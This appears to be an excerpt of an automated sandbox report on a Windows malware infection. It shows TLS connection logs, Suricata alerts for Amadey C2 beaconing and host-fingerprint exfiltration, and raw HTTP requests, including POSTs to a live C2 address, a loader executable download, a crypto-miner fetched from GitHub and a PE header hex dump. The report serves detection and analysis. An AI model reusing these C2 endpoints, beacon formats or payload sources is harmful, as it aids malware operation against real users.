                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49804 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49806 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49807 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49810 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49811 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49813 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49815 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49816 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49818 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49820 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49822 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49825 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49828 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49830 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49832 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49833 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49836 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49838 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49840 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49843 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49842 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49844 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49846 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49847 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49849 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49851 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49852 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49854 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49855 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49857 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49859 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49861 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49862 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49864 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49867 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49869 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49872 version: TLS 1.2
                        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.dr

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49737 -> 185.215.113.16:80
                        Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49738 -> 185.215.113.16:80
                        Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.4:49737
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorIPs: 185.215.113.16
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 15:42:03 GMTContent-Type: application/octet-streamContent-Length: 435820Last-Modified: Fri, 27 Sep 2024 14:49:05 GMTConnection: keep-aliveETag: "66f6c5e1-6a66c"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 12 00 86 a4 f6 66 00 e8 05 00 a8 08 00 00 f0 00 27 00 0b 02 02 1f 00 36 00 00 00 ae 00 00 00 0a 00 00 b0 14 00 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 a0 06 00 00 06 00 00 6c d7 06 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 00 00 0c 10 00 00 00 f0 00 00 c0 45 00 00 00 80 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 68 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 35 00 00 00 10 00 00 00 36 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 e0 00 00 00 00 50 00 00 00 02 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 50 c0 2e 72 64 61 74 61 00 00 c0 10 00 00 00 60 00 00 00 12 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 78 03 00 00 00 80 00 00 00 04 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 f0 02 00 00 00 90 00 00 00 04 00 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 80 09 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 0c 10 00 00 00 b0 00 00 00 12 00 00 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 d0 00 00 00 02 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 00 00 00 02 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 73 72 63 00 00 00 c0 45 00 00 00 f0 00 00 00 46 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2f 34 00 00 00 00 00 00 d0 04 00 00 00 40 01 00 00 06 00 00 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 31 39 00 00 00 00 00 1e 8e 04 00 00 50 01 00 00 90 04 00 00 ba 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 ea 29 00 00 00 e0 05 00 00 2a 00 00 00 4a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 4
                        Source: global trafficHTTP traffic detected: GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: GET /inc/loader_5879465914.exe HTTP/1.1Host: 185.215.113.16
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000359001&unit=246122658369
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
